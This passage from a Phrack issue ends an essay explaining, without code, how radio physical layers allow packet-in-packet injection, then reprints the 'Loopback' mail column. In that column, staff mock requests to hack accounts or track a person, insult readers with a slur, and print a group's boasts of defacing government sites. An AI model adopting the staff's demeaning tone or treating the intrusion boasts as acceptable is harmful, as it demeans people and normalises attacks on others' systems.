Firstly, the use of the CRC-based checking throughout the OSI mode
|
|
layers likely reinforces the faith in the ability of Layer 1 to detect
|
|
errors -- any symbol errors that accidentally corrupt the encapsulated
|
|
packet's structure while on the wire.
|
|
|
|
Secondly, the rather complex parsing code required for Layer 2 and
|
|
above to properly de-encapsulate respective payloads may lead its
|
|
readers to believe that similarly complex algorithms take place in
|
|
hardware or firmware in Layer 1.
|
|
|
|
However, L1 implementations are neither validity, authenticity, or
|
|
security filters, nor do they maintain complex enough state or context
|
|
about the frame's bytes they are receiving.
|
|
|
|
Aside from analog clock synchronization, their anatomy is nothing more
|
|
than that of a finite automaton that pulls bytes (more precisely,
|
|
symbols of the code that encodes the transmitted bytes, which differ
|
|
per protocol, both in bits/symbol and in modulation) out of the air,
|
|
continually.
|
|
|
|
The inherently noisy RF medium produces a constant stream of symbols.
|
|
The probability of hearing different symbols is actually non-uniform
|
|
and depends on the details of modulation and encoding scheme, such as
|
|
its error-correction.
|
|
|
|
As it receives the symbol stream, this automaton continually compares
|
|
a narrow window within the stream against the SFD sequence known to
|
|
start a frame. Once matched by this shift register, the symbols start
|
|
being accumulated in a buffer that will eventually be checksummed and
|
|
passed to the Layer 2 drivers.
|
|
|
|
Beyond the start-of-frame matching automation, the receiver has no
|
|
other context to determine whether symbols are in-frame payload, our
|
|
out-of-frame noise. It has no other concept of encapsulation or frame
|
|
validity. A digital radio is just a machine for pulling bytes out of
|
|
the air. It has weird machines in that same way -- and for the same
|
|
reasons -- that a vulnerable C program has weird machines.
|
|
|
|
Such encapsulation based on such a simple automaton is easily and
|
|
frequently broken in presence of errors. All that is needed is for the
|
|
chip's idea of the start-of-frame sequence -- typically, some of the
|
|
preamble + a Start of Frame Delimiter, a.k.a. Sync, or just the
|
|
latter where the preamble is used exclusively for analog
|
|
synchronization -- to not match, for the subsequent payload bytes to be
|
|
mistaken for the start-of-frame sequence or noise.
|
|
|
|
In fact, to mislead the receiving automaton to the _intended meaning_
|
|
of symbols (or bytes they are supposed to make up or come from) no
|
|
crafting manipulation is necessary: the receiving machine is so simple
|
|
that _random noise_ alone provides sufficient "manipulation" needed to
|
|
confuse its state and allow for packet-in-packet injection.
|
|
|
|
Thus injection for attackers without an especially cooperative radio
|
|
or in fact any radio at all -- so long as the attacker can leverage
|
|
some radio near the target to produce a predictable stream of symbols
|
|
-- is enabled by broken encapsulation.
|
|
|
|
=== What does this remind me of? ===
|
|
|
|
I remember the first time I witnessed a buffer overflow exploit, when
|
|
my Internet-facing Linux box, name Miskatonic, was exploited. Whoever
|
|
did that also opened a whole new world to me, and I'll be happy to
|
|
repay that debt with a beer should we ever meet in person.
|
|
|
|
At that time, I was a fairly competent C programmer, but I saw the
|
|
world in terms of functions that called other functions. Each of
|
|
these functions returned after being called to whichever address it
|
|
had been called from. I thought that the only way for a piece of code
|
|
to ever get executed was to be inside a function called at some point.
|
|
|
|
In other words, I regarded C functions as "atomic" abstractions. Even
|
|
though I implemented simple recursion and mutually recursive functions
|
|
via my own stacks a few times, it never occurred to me that a real
|
|
call stack could be anything other than a neat and perfect data
|
|
structure with "push", "pop", and referencing of variable slots.
|
|
|
|
Beware layers of abstractions. Take their expected, specified
|
|
operation on faith, and they will appear real. It is tempting to trust
|
|
a lower abstraction layer to provide _only_ the valid data structures
|
|
your next layer expects to receive, to assume that the lower layer's
|
|
designers already took responsibility for it. It is so tempting to
|
|
limit your considerations to the detail and complexity of the layer
|
|
you are working in.
|
|
|
|
Thus the layers of abstraction become boundaries of competence.
|
|
|
|
This temptation is overpowering on well-designed, abstraction-oriented
|
|
environments, where you lack any legal or effective means of PEEK-ing
|
|
or POKE-ing the underlying layers. Dijkstra decried BASIC as a
|
|
mind-mutilating language, but most real BASICs had PEEK and POKE to
|
|
explore the actual RAM, and one sooner or later found himself
|
|
wondering what they did. I wonder what Dijkstra would have said about
|
|
Java, which entirely traps the mind of a programmer in its
|
|
abstractions, with no hint of any other ways or idioms of programming.
|
|
|
|
|
|
=== How we could have avoided falling for it ===
|
|
|
|
The key to understanding this design problem is the incorrect
|
|
assumptions about how input is handled, in particular, of how it is
|
|
handled as a language, and the machine that handles it.
|
|
|
|
The _language-theoretic approach_ to finding just such misconceptions
|
|
and exploitable bugs based on it was developed by Len Sassaman
|
|
and Meredith L. Patterson. Watch their talks [3,4] and look for
|
|
upcoming papers at http://langsec.org
|
|
|
|
Such a language-theoretic analysis at L1 would have revealed this
|
|
immediately. Valid frames are phrases in the language of bytes that a
|
|
digital radio continually pulls out of the air, and the L1 seen as an
|
|
automaton for accepting valid phrases (frames) should reject
|
|
everything else.
|
|
|
|
The start-of-frame-delimiter matching functionality within the radio
|
|
chip is just a shift register and a comparison circuit -- too simple
|
|
an automaton, in fact, to guarantee anything about the validity of the
|
|
frame. With this perspective, the misconception of L2 expecting frame
|
|
encapsulation and validity becomes clear, almost trivial. The key to
|
|
finding the vulnerability is in choosing this perspective.
|
|
|
|
Conversely, there is no nicer source of 0-day than false assumptions
|
|
about what is on the other side of an interface boundary of a
|
|
textbook-blessed design. The convenient fiction of classic
|
|
abstractions leads one to imagine a perfect and perfectly trustworthy
|
|
machine on the other side, which takes care of serving up only the
|
|
right kind of inputs to one's own layer. And so layers of abstraction
|
|
become boundaries of competence.
|
|
|
|
References:
|
|
|
|
[1] Travis Goodspeed, Sergey Bratus, Ricky Melgares, Rebecca Shapiro,
|
|
Ryan Speers,
|
|
"Packets in Packets: Orson Welles' In-Band Signaling Attacks for
|
|
Modern Radios",
|
|
USENIX WOOT, August 2011,
|
|
http://www.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf
|
|
|
|
[2] Travis Goodspeed,
|
|
Remotely Exploiting the PHY Layer,
|
|
http://travisgoodspeed.blogspot.com/2011/09/
|
|
remotely-exploiting-phy-layer.html
|
|
|
|
[3] Len Sassaman, Meredith L. Patterson,
|
|
"Exploiting the Forest with Trees",
|
|
BlackHat USA, August 2010,
|
|
http://www.youtube.com/watch?v=2qXmPTQ7HFM
|
|
|
|
[4] Len Sassaman, Meredith L. Patterson,
|
|
"Towards a formal theory of computer insecurity: a language-theoretic
|
|
approach"
|
|
Invited Lecture at Dartmouth College, March 2011,
|
|
http://www.youtube.com/watch?v=AqZNebWoqnc
|
|
|
|
|
|
|=[ EOF ]=---------------------------------------------------------------=|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x05 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ L O O P B A C K ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Phrack Staff ]=--------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
Hi there!
|
|
|
|
The least we could say is that p67 caught the attention of a lot of people.
|
|
We got a very good feedback both IRL, on IRC and through the comments on
|
|
the website. Good. As you will soon find out, we had quite a bunch of
|
|
(un)interesting mails this year which we would like to share obviously ;>
|
|
Before going further, a quote from the last loopback is necessary:
|
|
|
|
---
|
|
We humbly apologize to all guys we never answered to neither by mail nor
|
|
through this phile because we suck at filtering our spam (this could
|
|
_absolutely_ not be a laziness issue, right?)
|
|
---
|
|
|
|
That said, we have to thank all the people that (un)voluntarily sent their
|
|
contributions, whatever these were.
|
|
|
|
As you will see, a polemic started with the release of the last scene phile
|
|
as several people felt a bit disappointed (to say the least) by the
|
|
description of the gr33k scene.
|
|
|
|
So let's explain a few things about the context of its writing:
|
|
- The writing itself is small and oriented because the authors didn't
|
|
have the time to do better.
|
|
- We (the phrack staff) are the ones who asked them for such a phile
|
|
and being in a hurry we couldn't give more than a couple of weeks to
|
|
the authors. Clearly they *SAVED* our sorry ass and they did it for
|
|
you, the community. Sincere apologies of the staff if this was not good
|
|
enough.
|
|
- (Greek) people may argue that the description was not accurate itself
|
|
but as you can remember, it was written with the idea of being
|
|
completed in this release:
|
|
|
|
|
|
Volume 0x0e, Issue 0x43, Phile #0x10 of 0x10
|
|
---
|
|
In this brief article we will attempt to give an overview of the current
|
|
state of the Greek computer underground scene. However, since the strictly
|
|
underground scene in Greece is very small, we will also include some
|
|
information about other active IT security related groups and forums. There
|
|
is a going to be a second part to this article at a future issue in which
|
|
we will present in detail the past of the underground Greek scene in all
|
|
its gory glory. ---
|
|
|
|
And they kept their promise with the help of some notorious big shots
|
|
of the greek hacking scene.
|
|
|
|
To the bunch of losers/masturbating monkeys who are still complaining:
|
|
|
|
/"\
|
|
|\./|
|
|
| |
|
|
| |
|
|
|>~<|
|
|
| |
|
|
/'\| |/'\..
|
|
/~\| | | | \
|
|
| =[@]= | | \
|
|
| | | | | \
|
|
| ~ ~ ~ ~ |` )
|
|
| /
|
|
\ /
|
|
\ /
|
|
\ _____ /
|
|
|--//''`\--|
|
|
| (( +==)) |
|
|
|--\_|_//--|
|
|
|
|
|
|
Don't worry, we published your side of the story as well. And now is time
|
|
for our little ... hem ... group therapy session ;-)
|
|
|
|
|
|
-- The Phrack Staff
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x00 - Phrack .VS. the social networks ]=--------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
From: Unix Root <1161967623738704101@mail.orkut.com>
|
|
Subject: orkut - Unix Root wants you to join orkut!
|
|
|
|
Unix Root wants you to join orkut.
|
|
|
|
[ Unix Root himself, seriously? ]
|
|
|
|
Join now!
|
|
http://www.orkut.co.in/Join.aspx?id=ZZZZZZZZZZZZZZ&mt=22
|
|
|
|
[ id has been replaced to protect the innocent (us) ]
|
|
|
|
|
|
* * *
|
|
|
|
What you can do on orkut:
|
|
- CONNECT with friends and family using scraps and instant messaging
|
|
- DISCOVER new people through friends of friends and communities
|
|
- SHARE your videos, pictures, and passions all in one place
|
|
|
|
[ Sounds like it would change my life. ]
|
|
|
|
Help Center: http://help.orkut.com/support/
|
|
|
|
[ To tell you the truth, help won't be necessary at this point :> ]
|
|
|
|
---
|
|
|
|
From: ***** ***** <thehackernews@gmail.com>
|
|
Subject: Invitation to connect on LinkedIn
|
|
|
|
LinkedIn
|
|
------------
|
|
|
|
|
|
I'd like to add you to my professional network on LinkedIn.
|
|
|
|
- *****
|
|
|
|
[ What if we do not intend to do business with you? ]
|
|
|
|
**** ****
|
|
Owner at The Hacker News
|
|
New Delhi Area, India
|
|
|
|
Confirm that you know **** *****
|
|
https://www.linkedin.com/e/xxxxxx-wwwwwwww-2h/isd/YYYYYYYYYYY/PPP_OOO/
|
|
|
|
--
|
|
(c) 2011, LinkedIn Corporation
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x01 - <?php include($teaMp0isoN) ?> ]=----------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Poison Blog <p0isonblog@ymail.com>
|
|
Subject: TeaMp0isoN: Issue 1
|
|
|
|
My first ever zine, read it and let me know what you think. hoping it gets
|
|
published in the next phrack magazine.
|
|
|
|
[ Hem. So basically this is a new concept: publishing a zine inside
|
|
another zine. And we even got 0day-hashes in the process. WIN/WIN ]
|
|
|
|
- TriCk
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x02 - The usual mails ]=-----------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
[ Have you ever been curious about the kind of mail we are used to
|
|
receive? Let's have a taste. ]
|
|
|
|
---
|
|
|
|
From: skywalker <oyyj07@gmail.com>
|
|
Subject: how can I get the source code
|
|
|
|
hello, I found some source code in phrack Magazine, but it is attach with
|
|
text mode, how can I get it?
|
|
|
|
[ Download the paper in "text mode". Then comment everything inside
|
|
that is not the code you want to compile and fire gcc.
|
|
It might work. If it doesn't mail nikoletaki_87@yahoo.gr for help. ]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: Phrack issue 58
|
|
|
|
How can i get the binary-encryption.tar.gz
|
|
from the article Runtime binary encryption?
|
|
|
|
[ You can't; it's encrypted. I think oyyj07@gmail.com has the password.
|
|
You should get in touch with him. ]
|
|
|
|
---
|
|
|
|
From: stephane.camprasse@free.fr
|
|
Subject: edition 64 infected by OSX:Niqtana
|
|
|
|
Hello there,
|
|
|
|
tar.gz of the magazine number 64 appears to be infected:
|
|
|
|
http://www.sophos.com/en-us/threat-center/threat-analyses/
|
|
viruses-and-spyware/OSX~Niqtana-A/detailed-analysis.aspx
|
|
|
|
[ Wow. Sounds like a serious issue. What should we do? ]
|
|
|
|
Kind Regards
|
|
|
|
Stephane Camprasse, CISSP
|
|
|
|
[ At first we wanted to laugh, then we saw you are serious business. ]
|
|
|
|
---
|
|
|
|
From: Domenico ****** <jmimmo82@gmail.com>
|
|
Subject: Mailing Lists Phrack
|
|
|
|
Dear Phrack Staff
|
|
|
|
I would like to subscribe at mailing lists of Phrack but email
|
|
addresses provided by the site not exist.
|
|
|
|
[ That's because there is no ML, dude. ]
|
|
|
|
What do you advise me?
|
|
|
|
[ Well, keep looking. ]
|
|
|
|
Best Regards
|
|
Domenico *******
|
|
|
|
---
|
|
|
|
From: Robert Simmons <rsimmons0@gmail.com>
|
|
Subject: phrack via email
|
|
|
|
Do you have a mailing list that sends phrack out via email, or at least an
|
|
email reminder to go download it?
|
|
|
|
[ We don't. What would be the point in a bloggo/twitto world where
|
|
information spreads that fast? ]
|
|
|
|
Rob
|
|
|
|
---
|
|
|
|
From: Elias <thesaltysalmon@gmx.com>
|
|
Subject: How do i subscribe?
|
|
|
|
As the title says, how do i subscribe to Phrack?
|
|
|
|
[ Since you're not polite we won't accept your subscription. Don't
|
|
mail us again. Please. ]
|
|
|
|
---
|
|
|
|
From: William Mathis <scotti@uniss.it>
|
|
Subject: One paper can change everything!
|
|
|
|
[ New submission???? :D ]
|
|
|
|
What do I mean? Of course the Diploma.
|
|
|
|
[ 0wned. Deception is part of the game :-/ ]
|
|
|
|
It is no secret that the knowledge, skills and experience play a crucial
|
|
role in getting the desired position, but despite the formality when
|
|
applying for a job essential requirement is a diploma! At the moment
|
|
receive a diploma is very expensive, takes time and power.
|
|
|
|
ORDER DIPLOMA RIGHT NOW AND RAISE THE PROFESSIONAL LEVEL, SKILLS AND
|
|
EXPERIENCE!
|
|
|
|
[ Can we send our order in via PDF? You have to open it with
|
|
Acroread 9.x though, since you're only worth an 0lday to us.
|
|
Thank you for playing "rm me harder" w/ phrackstaff! ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x03 - Desperate house wifes ]=-----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Luna Tix <lunatix@linuxmail.org>
|
|
Subject: A request regarding pdf files
|
|
|
|
[ Our resident Adobe consultant is currently on holidays. We do have our
|
|
.txt specialists however. ]
|
|
|
|
Hi,
|
|
|
|
I have downloaded some adobe 3d files from a website, and need them to be
|
|
converted into autodesk inventor ipt files.
|
|
|
|
[ You've knocked on the right door. ]
|
|
|
|
Can you teach me how to do this? If yes, I can send you some of the files
|
|
for trial, if you are successful, I am willing to pay for it.
|
|
|
|
[ Excellent! How much can you pay exactly? Our local liquor store no
|
|
longer accepts PDF conversion techniques in exchange for beer. ]
|
|
|
|
All the best.
|
|
|
|
Luna
|
|
|
|
---
|
|
|
|
From: sabrina <sabrina*******@gmail.com>
|
|
Subject: don't know where to go
|
|
|
|
|
|
hi,
|
|
i'm in need of someone to help me in a cyber cat burglar kind of way.
|
|
i've tried all the legal ways... police, fbi, fed trade commission all to
|
|
busy with terrorist.
|
|
|
|
[ Now that they've caught Osama, they should have some free time. Try
|
|
to contact them again. ]
|
|
|
|
i can go to a detective then civil lawyer but that would take way too mush
|
|
time and an exorbitant amount of money.
|
|
|
|
[ Clearly, you've mistaken us for the cheap option. ]
|
|
|
|
i need someone to find information
|
|
on exactly where someone is located. i have email address, cell phone and
|
|
bank account numbers ...
|
|
|
|
[ Do you have GPS coordinates? ]
|
|
|
|
I'm hoping to find or at least be lead to some one who is very creative in
|
|
using their computer. my only goal is to locate this person, i'm not out to
|
|
steal or do any harm.
|
|
|
|
[ I know some very creative people. They compose music on their
|
|
computer! For realz! Would that help you? ]
|
|
|
|
if you think you can help me i'll give you my phone number, i can then
|
|
better explain why this way for me would be the only way to go, i lost 20
|
|
years of my life's hard work, i just want to locate this person.
|
|
|
|
[ Wow, sorry for being so hard on you with the previous comments,
|
|
Sabrina. It is obvious to us now that you are clearly retarded.
|
|
Please leave a comment on the website with your phone number. We'll
|
|
get back to you. ]
|
|
|
|
thank you
|
|
sabrina
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x04 - Cooperation ]=---------------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Monika ****** <monika.******@software.com.pl>
|
|
Subject: cooperation
|
|
|
|
Dear Sir or Madam
|
|
|
|
[ It's professor actually. ]
|
|
|
|
My name is Monika *********. I represent Hakin 9'- IT Security magazine
|
|
(for more details, please see our website www.hakin9.org). I would be very
|
|
much interested in long term cooperation with your company.
|
|
|
|
[ Our company? :D ]
|
|
|
|
We would co-promote our services and spread the information on IT Security
|
|
together.
|
|
|
|
[ Well the problem is that we don't have that many services:
|
|
- 7-bit cleaning of ASCII papers, we are considered the market
|
|
leaders in this service
|
|
- Spam hunting with advanced regexp (i.e. matching ANTISPAM in the
|
|
subject)
|
|
- Mail storage, no backups though :(
|
|
- Technical review of papers when we understand them
|
|
See? That's not too much :-/
|
|
But thanks for the kind offer. PHRACK could totally use the promotion
|
|
of such a well established magazine as h8king (or whatever). ]
|
|
|
|
I am really looking forward to hearing from you.
|
|
|
|
[ Don't call us, we'll call you! ]
|
|
|
|
Best Regards,
|
|
|
|
Monika ********
|
|
|
|
Software Press
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x05 - Help is requested! (again) ]=-------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Kevin **** <********@att.net>
|
|
Subject: Help with Persistent BIOS Infection
|
|
|
|
Hope you can help. I have a small video business and from my son's school
|
|
flashdrive my network of computers are infected with Persistent BIOS
|
|
Infection. My hard drive's have been rearranged with FAT segments and i
|
|
believe is running my XP/Win7 OS's as a virtual machine.
|
|
|
|
[ Unfortunately Joanna is not part of the staff. But we have the
|
|
feeling that your analysis of the situation could be improved :> ]
|
|
|
|
This has caused my rendering performance to be ruduced by 50%. Also when i
|
|
make DVD's the infection is on the disc and from complants it infected
|
|
other machines. My software is legit and i don't download anything.
|
|
|
|
[ Of course. Who does anyway? Your son perhaps :> ]
|
|
|
|
I'm new (6yrs) to computers, i some what know what to do but not really.
|
|
|
|
[ So you know but you don't know. That's good, have the half of you
|
|
that knows guide the other half that doesn't. You can't go wrong. ]
|
|
|
|
I have killed my network and now keep all computers separate but know
|
|
somehow i will get the infection back.
|
|
|
|
[ You killed the poor network? :-/ ]
|
|
|
|
Could someone make me a batch file or better yet a ISO to boot and fix my
|
|
Bios and memory so it has Persistent BIOS Infection that is null. Giving
|
|
back my rendering power. Making it so i can't get this infection again.
|
|
|
|
[ Just a thought: maybe if you didn't run arbitrary batch files that
|
|
"someone" sent you, you wouldn't have this problem in the first
|
|
place. But most probably that's not it. It must be a 'Persistent BIOS
|
|
Infection' problem. ]
|
|
|
|
Maybe send me a zip file to my email address. Pleezz
|
|
I would be more than happy to donate for the cause.
|
|
|
|
[ And yet another person willing to give us money. We should really run
|
|
a company :D ]
|
|
|
|
Thank You
|
|
Kevin ****
|
|
*******@att.net
|
|
|
|
---
|
|
|
|
From: shashank **** <**********@gmail.com>
|
|
Subject: hey
|
|
|
|
hey,
|
|
i was searching some hacking forums site, & found one of the "phrack
|
|
Magazine".
|
|
|
|
[ Then you failed. It's not a forum kid :) ]
|
|
|
|
It was pretty interesting. Can you help me out on how to hack Steam
|
|
Account.
|
|
|
|
[ Do you have a paypal account? ]
|
|
|
|
---
|
|
|
|
From: David ***** <dfg******@yahoo.com>
|
|
Subject: RootKit Iphone 4g
|
|
|
|
Hey i was recently on your website and well i was looking for something to
|
|
mess with my friends, see were all in the same class and we all connect to
|
|
the same network/router thing, and you hve to login to gain acess to the
|
|
network, so i was wondering if there was a way to control my friends
|
|
computer with mine while were hook to the network.
|
|
|
|
[ XD ]
|
|
|
|
DoFoG
|
|
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x06 - About the scene philes ]=-----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Prashant KV <bug@null.co.in>
|
|
Subject: Thank You
|
|
|
|
[ You're very welcome. ]
|
|
|
|
Hi,
|
|
I would like say thanks each and every individual in Phrack team for
|
|
publishing our article. This will go a long way in creating awareness about
|
|
null community.
|
|
Thanks all....
|
|
|
|
[ And thank you for the scene phile. Always a pleasure to exchange with
|
|
interesting/nice people. ]
|
|
|
|
---
|
|
|
|
From: Hackers News <thehackernews@gmail.com>
|
|
Subject: Article Editing
|
|
|
|
[ HEY!!! You're the guy who tried to befriend us on linkedin!!! ]
|
|
|
|
Hello Sir,
|
|
We are admin of "*The Hacker News*" : *http://www.thehackernews.com/* . We
|
|
read an article on your Website :
|
|
http://www.phrack.org/issues.html?issue=67&id=16#article
|
|
I wanna ask you that on what basis you write about "*Indian Cyber Army :
|
|
http://www.cyberarmy.in/*" .
|
|
|
|
* Fake ICA. There is yet another ICA (cyberarmy.in) which is announced as
|
|
fake ICA by the actual ICA group. One glance at the website content
|
|
tells you that there is some truth to what the actual ICA(indishell)
|
|
guys and other say and reminds you of the infamous plagiarism cases
|
|
(Ah! Any Indian h4x0r's favourite topic when they feel like bitching
|
|
about something :-P)*
|
|
|
|
*Whatever you write is not fair and I think it represents the mistake
|
|
done by you, that you write about a group without knowing about them,
|
|
Read This : *
|
|
|
|
*http://www.cyberarmy.in/p/about-us.html*
|
|
|
|
*and I think you should 1st know about it. Hope you will edit the
|
|
article.... as soon as possible.*
|
|
|
|
[ You may or may not be right and clearly we don't have enough
|
|
information to judge. For the sake of the truth and freedom of
|
|
speech, we are posting your comment. ]
|
|
|
|
*Thanks,*
|
|
|
|
[ No prob dude. ]
|
|
|
|
*Owner*
|
|
|
|
*The Hacker News...*
|
|
|
|
---
|
|
|
|
[ The following is a mail that we received several times between the
|
|
21st and the 22nd of June... As we said in the introduction, a few
|
|
greek people were angry because of the scene phile. Because we're
|
|
(not that much) bastards, we felt that these people deserved the
|
|
right to be published as well. So here it is...
|
|
|
|
Oh and they even pasted it in the comments! ]
|
|
|
|
|
|
From: xak xak0r <xak3ri@hotmail.com>
|
|
Subject: Greek Hacking Scene is alive!
|
|
|
|
From: Unkn0wn <unknown.ws1@gmail.com>
|
|
Subject: GHS - read this message
|
|
|
|
From: Spyros Kous <spirou1988@hotmail.com>
|
|
Subject: GHS for you.
|
|
|
|
From: nikos piperos <piperos_22@hotmail.com>
|
|
Subject: By <GHS>
|
|
|
|
From: ****** ******* <deathlyrhymer@hotmail.com>
|
|
Subject: greek.hacking.scene
|
|
|
|
[ Sorry, due to ASCII constraints we had to censor the name of this
|
|
guy :D ]
|
|
|
|
From: Stephen O'Neill <apple-whore@hotmail.com>
|
|
Subject: 0xghs
|
|
|
|
[ You've got your hex wrong dude ]
|
|
|
|
From: Brian Higgins <bhiggins69@hotmail.com>
|
|
Subject: **************************
|
|
|
|
[ Hey next time write the subject in english please :) ]
|
|
|
|
From: eibhlin mcnamara <mcnamara105@hotmail.com>
|
|
Subject: G*H*S - always here
|
|
|
|
[ A sibling of Sean maybe? ]
|
|
|
|
From: nikpa pfcc <aeknik@hotmail.com>
|
|
Subject: Greek Hacking Scene - Read your errors
|
|
|
|
From: nikpa papaa <nikpa21@gmail.com>
|
|
Subject: Greek Hacking Scene - Read your errors
|
|
|
|
[ Yeah, we ordered the lamb gyros with extra pita and tzatziki. None of
|
|
you guys delivered. Worst Greek Hacking Scene evar! Would not order
|
|
from you again. ]
|
|
|
|
From: NIKO*** *ANTAZO*OY*** <aeknik@yahoo.gr>
|
|
Subject: Read this, about errors - GHS
|
|
|
|
[ This one had his name only partially encrypted. ]
|
|
|
|
From: kondor fromGHS <kondorghs@gmail.com>
|
|
Subject: Greek Hacking Scene
|
|
|
|
[ Hey Kevin Mitnick? :) ]
|
|
|
|
Nice to see Greek Hacking Scene on Phrack, but very sad to say that there
|
|
is no connection of all those with reality. This post represents something
|
|
that even doesn't exist except theory.
|
|
|
|
In the other hand, is not mentioned technological steps and targets that
|
|
Greek Hacking Scene archived, not in theory, but in actions.
|
|
|
|
However in the References i see nothing trust source, while you avoid posts
|
|
on newspapers, magazines and tv about Greek Hacking Scene.
|
|
|
|
Maybe Phrack can't handle the name of GHS and writing about fantasies.
|
|
Greek Hacking Scene is not a group, team or crew etc. but is ideology of
|
|
decades, is not about fame, but is about targets, technology and advance.
|
|
You must know that GHS does NOT follow things such "Hackers Manifesto" and
|
|
is well known that this person take back what he said about this manifesto
|
|
in shake to save him from things. He even does NOT defence his ideology,
|
|
how then we can accept such thing?! Basically we are what we create and we
|
|
gonna call hacking what we think hacking is, you can call us as you want,
|
|
but this can't change our actions, we not negotiate our ideology and we are
|
|
not followers of any paid, fantasy or theory ideologies. We rage against
|
|
machine, the system. Is good that Phrack exist cuz keep the magic to those
|
|
who want to be related with hacking. While you keep the feeling of magic to
|
|
your readers, we know that is all about coding, methodology and how far
|
|
each mind can think to do things.
|
|
|
|
For those who forgets, security is a part of hacking, security is not
|
|
hacking. Hacking is every electronic violation, violation doesn't mean that
|
|
is illegal always. As a term, hacking is every electronic violation.
|
|
|
|
About Greek Hacking Scene you forget to mention a lot of groups and people
|
|
(and is not about names) who they did things and they left lot of stuffs
|
|
behind. Those people and groups they never care about their nicknames or
|
|
the name of the group cuz is useless, can be any nickname or group name, at
|
|
the end what it left, is what had created. Who make it, it doesn't matter
|
|
really cuz those who make it as share they do it cuz they want.
|
|
|
|
If is to write about things that are not related with the true and reality,
|
|
better don't write about Greek Hacking Scene. You can write for posers and
|
|
others who they want fame, but not for GHS. You can write fantasy, stories,
|
|
anything you like, but as long as is not connected with reality and true,
|
|
then don't write about Greek Hacking Scene. Maybe you can write for any
|
|
other Greek Hacking Scene you want or you believe, but mention also that is
|
|
not connected all those stories with Greek Hacking Scene (GREEK SENTENCE).
|
|
|
|
[ GREEK SENTENCE is something written in greek that we could not
|
|
translate nor write in the phile because of the greek alphabet. ]
|
|
|
|
Cheers,
|
|
|
|
|
|
Your article forgets to write about DefCon meetings that take place in
|
|
Greece, and of course about the unique Codehack meetings that shows live
|
|
Hacking. Or even is not mentioned things such SpyAdmin and Firehole, or
|
|
what about Hash, Phrapes, Cdx, r00thell, hackgr and more?! What about the
|
|
references on magazines, newspapers and tv? What about the members of Greek
|
|
Hacking Scene that works on penetration testing companies or making atm
|
|
softwares and banking or those who works in known computers and servers
|
|
companies and they create technology?!
|
|
|
|
About the grhack (that nobody knows) is those guys from auth that got
|
|
hacked their servers and their pcs and tooked personal files of them?
|
|
|
|
Check this link:
|
|
http://zone-h.org/mirror/id/6638423
|
|
|
|
I read slasher?! This person who has the grhack site that you took as
|
|
reference?! With the name ********** **********?!
|
|
|
|
[ Publishing an individual's real name is against our rules. You
|
|
got away with it in the comment section once. ]
|
|
|
|
Oh come on, i have also beautiful pictures who they poser as engineers!
|
|
Oh now i got it! They write about their selfs! How smart... what a fame...
|
|
what a pose!
|
|
|
|
Before you write anything about Greek Hacking Scene take a look to the
|
|
targets. We have down anarchist such indymedia sites, and also nationalist
|
|
sites, as well he hacked into Goverment sites, political parties, national
|
|
services, and of course all the hacking-security related greek sites who
|
|
they offer only theory and lies that has no connection with reallity and
|
|
hacking.
|
|
|
|
And i guess so you promote the Anarchy?! So don't forget Phrack to mention
|
|
that everything you wrote is about Anarchy, not about hacking.
|
|
|
|
Greek Hacking Scene has members from all political sides and we have things
|
|
in common we work for.
|
|
|
|
This is grhack.net, this is the guy that send hopeless messages to google
|
|
blogspot to DOWN the info that SpyAdmin post, passwords, files, everything!
|
|
|
|
|
|
